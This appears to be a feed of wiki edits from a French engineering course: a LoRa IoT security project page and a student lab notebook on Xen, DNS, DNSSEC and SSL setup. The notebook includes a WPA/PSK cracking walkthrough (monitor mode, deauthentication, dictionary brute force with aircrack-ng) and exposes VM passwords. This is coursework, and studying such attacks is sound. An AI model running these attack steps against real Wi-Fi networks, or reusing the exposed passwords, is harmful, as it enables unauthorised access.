		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Antenne.jpg&amp;diff=35688</id>
		<title>Fichier:Antenne.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Antenne.jpg&amp;diff=35688"/>
				<updated>2016-12-07T09:37:17Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35687</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35687"/>
				<updated>2016-12-07T09:36:10Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
[[Fichier:antenne.PNG]]&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35483</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35483"/>
				<updated>2016-11-28T16:33:37Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Crack clé WPA/PSK */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-home -v&lt;br /&gt;
 lvcreate -L 10G -n /dev/virtual/ima5-Frotteman-var -v&lt;br /&gt;
&lt;br /&gt;
Ajouts des partitions à la configuration de la machine virtuelle.&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-home,xvdb,w',&lt;br /&gt;
 'phy:/dev/virtual/ima5-Frotteman-var,xvdc, w',&lt;br /&gt;
&lt;br /&gt;
=Séance4=&lt;br /&gt;
&lt;br /&gt;
Commande pour démarrer la VM lorsqu'elle est totalement éteinte :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/Frotteman.cfg&lt;br /&gt;
&lt;br /&gt;
Nom de domaine réservé sur gandi.net&lt;br /&gt;
&lt;br /&gt;
 faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
=Séance5=&lt;br /&gt;
&lt;br /&gt;
Installation de bind9 sur la VM xen.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/bind/named.conf.local&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;faispastomberlasavo.net&amp;quot; {&lt;br /&gt;
           type master;&lt;br /&gt;
           file &amp;quot;/etc/bind/db.faispastomberlasavo.net&amp;quot;;&lt;br /&gt;
           allow-transfer { 217.70.177.40; };&lt;br /&gt;
      };&lt;br /&gt;
&lt;br /&gt;
Créez le fichier de zone /etc/bind/db.faispastomberlasavo.net&lt;br /&gt;
 &lt;br /&gt;
 TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.faispastomberlasavo.net. root.faispastomberlasavo.net. (&lt;br /&gt;
                        2              ; Serial&lt;br /&gt;
                        604800         ; Refresh&lt;br /&gt;
                         86400         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                        604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
         IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      NS      ns.faispastomberlasavo.net.&lt;br /&gt;
 ns      IN      A       193.48.57.161&lt;br /&gt;
 www     IN      A       193.48.57.161&lt;br /&gt;
 @       IN      A       193.48.57.161&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Redémarrer bind&lt;br /&gt;
&lt;br /&gt;
 /etc/init.d/bind9 restart&lt;br /&gt;
&lt;br /&gt;
Changez la configuration des serveurs du domaine Gandi &lt;br /&gt;
 DNS1: ns.faispastomberlasavo.net&lt;br /&gt;
 DNS2: ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Commande:&lt;br /&gt;
 nslookup www.faispastomberlasavo.net&lt;br /&gt;
&lt;br /&gt;
Résultat:&lt;br /&gt;
 Server:		193.48.57.161&lt;br /&gt;
 Address:	193.48.57.161#53 &lt;br /&gt;
 &lt;br /&gt;
 Name:	www.faispastomberlasavo.net&lt;br /&gt;
 Address: 193.48.57.161&lt;br /&gt;
&lt;br /&gt;
=Séance6=&lt;br /&gt;
commande pour générer certificat SSL &lt;br /&gt;
 &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:France&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:faispastomberlasavo.net&lt;br /&gt;
 Email Address []:cedricduval94@gmail.com&lt;br /&gt;
&lt;br /&gt;
On ajoute le contenu du fichier serveur.csr dans gandi&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNSSEC&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE  faispastomberlasavo.net &lt;br /&gt;
&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-ksk.key&lt;br /&gt;
 $include /etc/bind/ faispastomberlasavo.net.dnssec/ faispastomberlasavo.net-zsk.key&lt;br /&gt;
&lt;br /&gt;
 /etc/bind/faispastomberlasavo.net.dnssec# dnssec-signzone -o  faispastomberlasavo.net -k  faispastomberlasavo.net-ksk ../db. faispastomberlasavo.net faispastomberlasavo.net-zsk&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.faispastomberlasavo.net.signed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@Frotteman:/etc/bind# dig DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 &lt;br /&gt;
 ; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY faispastomberlasavo.net @localhost&lt;br /&gt;
 ;; global options: +cmd&lt;br /&gt;
 ;; Got answer:&lt;br /&gt;
 ;; -&amp;gt;&amp;gt;HEADER&amp;lt;&amp;lt;- opcode: QUERY, status: NOERROR, id: 10598&lt;br /&gt;
 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
 &lt;br /&gt;
 ;; OPT PSEUDOSECTION:&lt;br /&gt;
 ; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
 ;; QUESTION SECTION:&lt;br /&gt;
 ;faispastomberlasavo.net.	IN	DNSKEY   &lt;br /&gt;
 &lt;br /&gt;
 ;; ANSWER SECTION:&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	257 3 5 AwEAAa3Js66YHVQrw4q+4IKA71lRK9AXWznEZyoxVCxr0SSYx+TFUXxh VTbjq1H8aYjwUa1UyuFsHUC72wJcTNCo0DNOX6Qcek/Y9O30x8xnXRdB OsNFLhnc5v4b5mLTGLswS3GpBCgP8+xSj4LmZPrLZneVom5Q2xCl40KT b5WdpMXXmPjaPOk24gdr5QYzZxrSIqmbEjp2DPaCZiAqPJ8hvvqPFQ+Q Bq53a5/ra3PfN1uo0B2WzeGN0nsb3QDLAREmuovHxSJjm23Yv7rcU8eb txBuOPkbgyES/ybN0uWvW3hiHipXeMCa+yRywnle2Ea56k6w4bcPNta3 8qeF3KwqszE=&lt;br /&gt;
 faispastomberlasavo.net. 604800	IN	DNSKEY	256 3 5 AwEAAe+I1C2IYzY323K1HXia8curPC+ZduRAiXpsYMdBRyTQOpxTf0zf ulFh42UOPhRCrYm3CZkOesUjhbS0Z3WVzy6u/RHJDRKiqNUbpnBN8jQf mmhIx8FJU3Kcu5st+T6cRWOEoCQIS6tOM31u5I4NKrhXZamDiV361YTQ nJrJNT//&lt;br /&gt;
 &lt;br /&gt;
 ;; Query time: 0 msec&lt;br /&gt;
 ;; SERVER: 127.0.0.1#53(127.0.0.1)&lt;br /&gt;
 ;; WHEN: Mon Nov 28 17:05:19 CET 2016&lt;br /&gt;
 ;; MSG SIZE  rcvd: 476&lt;br /&gt;
&lt;br /&gt;
==Crack clé WPA/PSK==&lt;br /&gt;
&lt;br /&gt;
Tout d'abord il faut passer l'interface réseau en mode &amp;quot;Monitor&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan1&lt;br /&gt;
&lt;br /&gt;
Nous pouvons détecter les hotspots grâce à l'utilitaire airodump-ng&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
Nous voulions trouvé la clé de &amp;quot;cracotte01&amp;quot;, nous avons donc filtré pour le bssid &amp;quot;04:DA:D2:9C:50:50&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w out --bssid 04:DA:D2:9C:50:50 mon0&lt;br /&gt;
 aireplay-ng -0 0 -a 04:DA:D2:9C:50:50&lt;br /&gt;
&lt;br /&gt;
Nous avons créer notre dictionnaire de la façon suivante&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o dico.txt&lt;br /&gt;
&lt;br /&gt;
Que nous avons tester sur une Zabeth par soucis de rapidité&lt;br /&gt;
 &lt;br /&gt;
 aircrack-ng -w dico.txt out-01.cap&lt;br /&gt;
&lt;br /&gt;
Qui nous a donné le résultat suivant&lt;br /&gt;
&lt;br /&gt;
 [[Fichier:Aircrack_screen.png|500px|thumb|center]]&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35482</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35482"/>
				<updated>2016-11-28T16:33:18Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Crack clé WPA/PSK */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
